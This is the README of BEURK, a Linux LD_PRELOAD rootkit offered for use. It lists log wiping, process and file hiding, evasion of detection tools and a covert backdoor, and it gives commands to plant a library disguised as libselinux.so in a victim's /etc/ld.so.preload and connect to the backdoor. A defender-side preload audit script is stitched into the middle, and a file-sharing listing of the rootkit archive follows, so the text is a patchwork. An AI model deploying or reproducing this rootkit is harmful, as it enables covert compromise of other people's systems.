BEURK
=====
[Getting Started] | [API Documentation] | [Contributing] | [TODO List]
[![Travis Build][Travis badge]](https://travis-ci.org/unix-thrust/beurk)
[![Ready Issues][Waffle badge]](https://waffle.io/unix-thrust/beurk)
[![Coverage Status][Cover badge]](https://coveralls.io/r/unix-thrust/beurk)
[![Jenkins Build][Jenkins badge]](http://ci.zgun-family.eu/job/BEURK/)
[![Join the chat at https://gitter.im/unix-thrust/beurk](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/unix-thrust/beurk)
**BEURK** is a userland [preload rootkit] for GNU/Linux, heavily focused
on anti-debugging and anti-detection.
> _**If they knew, they would vomit ...**_
>
> *- The core team -*
-------------------------------------------------------------------------------
### Features ###
- Hide attacker files and directories
- Real-time log cleanup (on [utmp/wtmp])
- Evades process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
### Upcoming features ###
- [ptrace(2)] hooking for anti-debugging
- [libpcap] hooking to undermine local sniffers
- PAM backdoor for *local privilege escalation*
### Usage ###
* **Compile**
```sh
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
```
* **Install**
```sh
scp libselinux.so [email protected]:/lib/
ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'
```
* **Enjoy!**
```sh
./client.py victim_ip:port # connect with furtive backdoor
```
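The Install step above persists the rootkit by appending a line to `/etc/ld.so.preload`, which the dynamic loader maps into every dynamically linked process. The following script is an added, defender-side example (it is not part of BEURK and makes no use of its code): it parses that file, reports each listed object and whether it exists on disk, and returns non-zero when any entry is present. The `list_preload`, `count_preload` and `audit_preload` function names and the sample file contents are constructed for this example.

```sh
#!/bin/sh
# Added example, not part of BEURK: audit the persistence mechanism used
# by the Install step above. ld.so reads /etc/ld.so.preload and loads
# every object listed there into every dynamically linked process, so on
# most hosts the correct state of that file is "absent or empty" and any
# entry deserves review.

# list_preload FILE: print one library path per line.
# The file is whitespace-separated; ':' separators and '#' comments are
# normalised as well so the same parser can be fed an LD_PRELOAD value.
list_preload() {
    [ -f "$1" ] || return 0
    sed 's/#.*//' "$1" | tr ':' ' ' | tr -s ' \t' '\n\n' | sed '/^$/d'
}

# count_preload FILE: number of entries (0 for a missing or empty file).
count_preload() {
    list_preload "$1" | wc -l | tr -d ' '
}

# audit_preload [FILE]: report entries; returns 1 if any exist, 0 otherwise.
audit_preload() {
    file="${1:-/etc/ld.so.preload}"
    n=$(count_preload "$file")
    if [ "$n" -eq 0 ]; then
        echo "ok: no preload entries in $file"
        return 0
    fi
    echo "ALERT: $n preload entries in $file"
    list_preload "$file" | while read -r lib; do
        # A familiar-looking name proves nothing: the README above installs
        # its object as /lib/libselinux.so. Only on-disk presence is checked
        # here; follow up with the package manager (dpkg -S, rpm -qf).
        if [ -e "$lib" ]; then
            echo "  $lib (present on disk)"
        else
            echo "  $lib (not on disk: dangling entry)"
        fi
    done
    return 1
}

# Demo on a constructed sample file (not a real host's preload file).
sample=$(mktemp)
printf '# constructed sample\n/lib/libselinux.so\n' > "$sample"
audit_preload "$sample" || echo "-> review the listed objects"
rm -f "$sample"

# Real check on this host (default argument is /etc/ld.so.preload).
audit_preload || :
```

Run it from a statically linked shell or a rescue environment when a preload rootkit is suspected: a hooked `open`/`fopen` in the audited process could otherwise hide the file's contents from the very script reading it, so a non-zero result is meaningful but a clean result from a dynamically linked shell is not proof of absence.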
### Dependencies ###
The following packages are not currently required to build BEURK:
* **libpcap** - to avoid local sniffing
* **libpam** - for local PAM backdoor
* **libssl** - for encrypted backdoor connection
**Example on debian:**
```sh
apt-get install libpcap-dev libpam-dev libssl-dev
```
-------------------------------------------------------------------------------
[![Waffle metrics][Waffle metrics]](https://waffle.io/unix-thrust/beurk/metrics)
* _**BEURK v1.0 is in active development,**_
_**please check out the current [development branch].**_
> NOTE: **BEURK** is a recursive acronym for
> **B**EURK **E**xperimental **U**nix **R**oot **K**it
-------------------------------------------------------------------------------
[Getting Started]: https://github.com/unix-thrust/beurk/wiki
[API Documentation]: https://github.com/unix-thrust/beurk/wiki/API-Documentation
[TODO List]: https://github.com/unix-thrust/beurk/blob/master/TODO.md
[Contributing]: https://github.com/unix-thrust/beurk/blob/master/CONTRIBUTING.md
[Travis badge]: https://travis-ci.org/unix-thrust/beurk.svg?branch=master
[Waffle badge]: https://badge.waffle.io/unix-thrust/beurk.svg?label=Ready&title=Ready-Issues
[Cover badge]: https://img.shields.io/coveralls/unix-thrust/beurk.svg
[Jenkins badge]: http://ci.zgun-family.eu/job/BEURK/badge/icon
[Waffle metrics]: https://graphs.waffle.io/unix-thrust/beurk/throughput.svg
[preload rootkit]: http://volatility-labs.blogspot.fr/2012/09/movp-24-analyzing-jynx-rootkit-and.html
[utmp/wtmp]: http://man7.org/linux/man-pages/man5/utmp.5.html
[ptrace(2)]: http://man7.org/linux/man-pages/man2/ptrace.2.html
[libpcap]: http://en.wikipedia.org/wiki/Pcap#libpcap
[development branch]: https://github.com/unix-thrust/beurk/tree/dev
-------------------------------------------------------------------------------
**wazuh installation, rootkit principle analysis and detection practice**
Archive of 104 files (47 .c, 18 .sh, 7 .h), 86KB ZIP, uploaded 2023-08-20 09:23:40; 1 download, 27 views.
Archive contents (104 files):
drop_shell_backdoor.c 7KB
init.c 3KB
debug.c 3KB
is_hidden_file.c 2KB
cleanup_login_records.c 2KB
hide_tcp_ports.c 2KB
open.c 2KB
hide_tcp_ports.c 2KB
is_attacker.c 1KB
readdir64.c 1KB
fopen64.c 1KB
fopen.c 1KB
__xstat64.c 1KB
__xstat.c 1KB
readdir.c 1KB
__lxstat64.c 1KB
__lxstat.c 1KB
is_procnet.c 1KB
stat64.c 1KB
accept.c 1KB
unlinkat.c 1KB
lstat64.c 1KB
stat.c 1KB
link.c 1KB
lstat.c 1KB
open.c 1KB
access.c 1KB
unlink.c 1KB
rmdir.c 1KB
is_hidden_file.c 982B
drop_shell_backdoor.c 975B
main.c 882B
is_procnet.c 521B
is_attacker.c 397B
accept.c 392B
open.c 334B
cleanup_login_records.c 193B
lstat.c 131B
stat.c 130B
readdir.c 126B
test.c 113B
unlinkat.c 68B
fopen.c 67B
link.c 64B
access.c 63B
unlink.c 59B
rmdir.c 59B
commit-msg 58B
beurk.conf 2KB
Makefile.dep 3KB
.gitignore 104B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitkeep 0B
.gitmodules 93B
config.h 4KB
hooks.h 2KB
hooks.h 2KB
beurk.h 2KB
beurk.h 1KB
debug.h 1KB
tests.h 699B
LICENSE 34KB
Makefile 4KB
Makefile 739B
README.md 3KB
README.md 1KB
CONTRIBUTING.md 1KB
TODO.md 900B
README.md 197B
run.py 5KB
client.py 4KB
commit-msg.py 4KB
coverage.py 2KB
internal_hooks_calls.py 2KB
check_gplv3_headers.py 1KB
reconfigure 11KB
run.sh 2KB
run-tests.sh 1KB
run.sh 1KB
run.sh 1KB
makefile.sh 1KB
client.sh 1KB
jenkins-tests.sh 542B
check_commits_history.sh 376B
deploy_git_hooks.sh 176B
socat-client.sh 162B
lsof.sh 0B
ps.sh 0B
ldd.sh 0B
lynis.sh 0B
rkhunter.sh 0B
ossec.sh 0B
chkrootkit.sh 0B
tiger.sh 0B
utmp.test 175B
files.test 153B
proc-net-tcp-with-hidden_port.txt 873B
Uploader: 沐芊屿 (78 followers, 1 resource)